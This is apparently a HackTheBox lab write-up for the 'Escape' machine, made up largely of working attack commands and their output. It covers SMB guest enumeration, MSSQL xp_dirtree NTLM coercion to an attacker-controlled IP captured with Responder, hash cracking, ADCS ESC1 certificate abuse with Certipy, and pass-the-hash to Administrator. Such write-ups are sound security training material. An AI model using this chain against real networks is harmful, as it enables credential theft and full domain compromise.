~/writeups/Escape
Medium Windows Active Directory
Escape.
Medium Windows Active Directory MSSQL xp_dirtree NTLM ADCS ESC1 HackTheBox
Medium Windows Active Directory machine on sequel.htb. Anonymous SMB access exposes a PDF containing SQL credentials. From MSSQL, xp_dirtree coerces an outbound NTLM authentication captured by Responder — cracking the hash gives WinRM access as sql_svc. The SQL error log contains a password typed into the username field, pivoting to Ryan.Cooper. An ADCS ESC1 misconfiguration allows requesting a certificate for Administrator, yielding the NT hash via Certipy and faketime for the +8h clock skew.
User Flag
b25d949f62xxxxxxxxxxxxxxxxxxxxxx
Root Flag
4523a45b65xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance

Full port scan reveals a Domain Controller profile with an exposed MSSQL instance. Note the ~8h clock skew — this will matter during Kerberos authentication later.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.xx.xx 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec 389/tcp open ldap Domain: sequel.htb 445/tcp open microsoft-ds Windows Server 2019 1433/tcp open ms-sql-s SQL Server 2019 RTM 5985/tcp open wsman WinRM |_clock-skew: mean: 7h59m58s
clock skew +8h: Kerberos requires clocks within 5 minutes of the DC. Certipy's auth step will fail without compensating — use faketime -f "+8h" per-command.
/etc/hosts
$ echo "10.129.xx.xx sequel.htb dc.sequel.htb" | sudo tee -a /etc/hosts

Test SMB — null session is denied but the guest account works and reveals a non-default Public share:

SMB guest access
$ nxc smb 10.129.xx.xx -u guest -p '' --shares Public READ IPC$ READ $ smbclient //10.129.xx.xx/Public -U guest smb:\> get "SQL Server Procedures.pdf"

The PDF is an internal onboarding document. A section at the bottom provides SQL Server access for users whose accounts haven't been created yet:

SQL Server Procedures.pdf
User: PublicUser Password: GuestUserCantWrite1
credentials: PublicUser:GuestUserCantWrite1 for MSSQL. The document also mentions users Tom, Ryan, and Brandon — worth noting.
02Foothold — xp_dirtree NTLM Coercion

Connect to MSSQL and assess privilege level. xp_cmdshell is locked, but xp_dirtree is available — it accepts UNC paths, forcing an outbound NTLM authentication we can capture with Responder.

MSSQL — check privs
$ impacket-mssqlclient sequel/PublicUser:GuestUserCantWrite1@10.129.xx.xx SQL> SELECT IS_SRVROLEMEMBER('sysadmin'); 0 SQL> EXEC xp_cmdshell 'whoami'; EXECUTE permission denied.
Responder + xp_dirtree coercion
# terminal 1 — start Responder $ sudo responder -I tun0 -v # terminal 2 — trigger outbound auth from MSSQL SQL> EXEC master.dbo.xp_dirtree '\\10.10.14.78\share', 1, 1; # Responder captures: [SMB] NTLMv2 Username : sequel\sql_svc [SMB] NTLMv2 Hash : sql_svc::sequel:1a34688b7f2bac9b:DD3BD9CD...
finding: SQL Server runs as sequel\sql_svc. NTLMv2 hash captured.
hashcat — crack NTLMv2
$ hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt sql_svc::sequel:...:REGGIE1234ronnie

sql_svc can use WinRM:

WinRM as sql_svc
$ nxc winrm 10.129.xx.xx -u sql_svc -p 'REGGIE1234ronnie' [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!) $ evil-winrm -i 10.129.xx.xx -u sql_svc -p 'REGGIE1234ronnie'
03Lateral Movement — Password in SQL Error Log

From the sql_svc shell, browse the filesystem. C:\Users shows a Ryan.Cooper profile — inaccessible for now. But SQL Server error logs are readable and contain something unexpected:

SQL error log — password typed as username
*EWR* type C:\SQLServer\Logs\ERRORLOG.BAK Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match... Logon failed for user 'NuclearMosquito3'. Reason: Password did not match...
finding: someone typed their password (NuclearMosquito3) into the username field during SQL Server setup. The error log captured it in plaintext. Credentials: ryan.cooper:NuclearMosquito3.
WinRM as Ryan.Cooper → user flag
$ evil-winrm -i 10.129.xx.xx -u ryan.cooper -p 'NuclearMosquito3' *EWR* cat C:\Users\Ryan.Cooper\Desktop\user.txt b25d949f62xxxxxxxxxxxxxxxxxxxxxx
user flag obtained.
04Privilege Escalation — ADCS ESC1

While on sql_svc, whoami /groups showed membership in BUILTIN\Certificate Service DCOM Access — a hint that ADCS is installed and worth enumerating. Run Certipy as Ryan.Cooper to find vulnerable templates:

Certipy — find vulnerable templates
$ certipy-ad find -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' \ -dc-ip 10.129.xx.xx -vulnerable -stdout Template Name : UserAuthentication Enrollee Supplies Subject : True Client Authentication : True Enrollment Rights : SEQUEL.HTB\Domain Users [!] ESC1 : Enrollee supplies subject, template allows client authentication.
ESC1: The template lets any Domain User specify an arbitrary Subject Alternative Name (SAN) while also allowing Client Authentication. This means any domain user can request a certificate that impersonates any account — including Administrator.

Request a certificate with the Administrator's UPN in the SAN:

Certipy — request cert for Administrator
$ certipy-ad req \ -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' \ -ca sequel-DC-CA \ -template UserAuthentication \ -upn administrator@sequel.htb \ -dc-ip 10.129.xx.xx [*] Got certificate with UPN 'administrator@sequel.htb' [*] Saved as 'administrator.pfx'

Authenticate with the certificate to get the NT hash. The +8h clock skew causes KRB_AP_ERR_SKEW — wrap the command in faketime:

Certipy auth (faketime +8h)
# without faketime — fails $ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.129.xx.xx [-] KRB_AP_ERR_SKEW(Clock skew too great) # with faketime — succeeds $ faketime -f "+8h" certipy-ad auth -pfx administrator.pfx \ -domain sequel.htb -username administrator -dc-ip 10.129.xx.xx [*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
05Root Flag
PTH → Administrator shell
$ evil-winrm -i 10.129.xx.xx -u administrator -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee' *EWR* cat C:\Users\Administrator\Desktop\root.txt 4523a45b65xxxxxxxxxxxxxxxxxxxxxx
attack chain:
SMB guest → Public share → PDF with PublicUser:GuestUserCantWrite1 → MSSQL → xp_dirtree coerces NTLM → Responder captures sql_svc NTLMv2 → hashcat (m5600) → sql_svc:REGGIE1234ronnie → WinRM → ERRORLOG.BAK password-as-username leak → ryan.cooper:NuclearMosquito3 → Certipy ESC1 on UserAuthentication template → cert for administrator@sequel.htb → faketime +8h → NT hash → PTH → root
← all writeups